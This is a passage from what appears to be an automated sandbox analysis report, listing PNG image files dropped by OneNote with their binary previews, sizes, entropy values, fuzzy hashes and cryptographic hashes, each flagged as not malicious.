                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
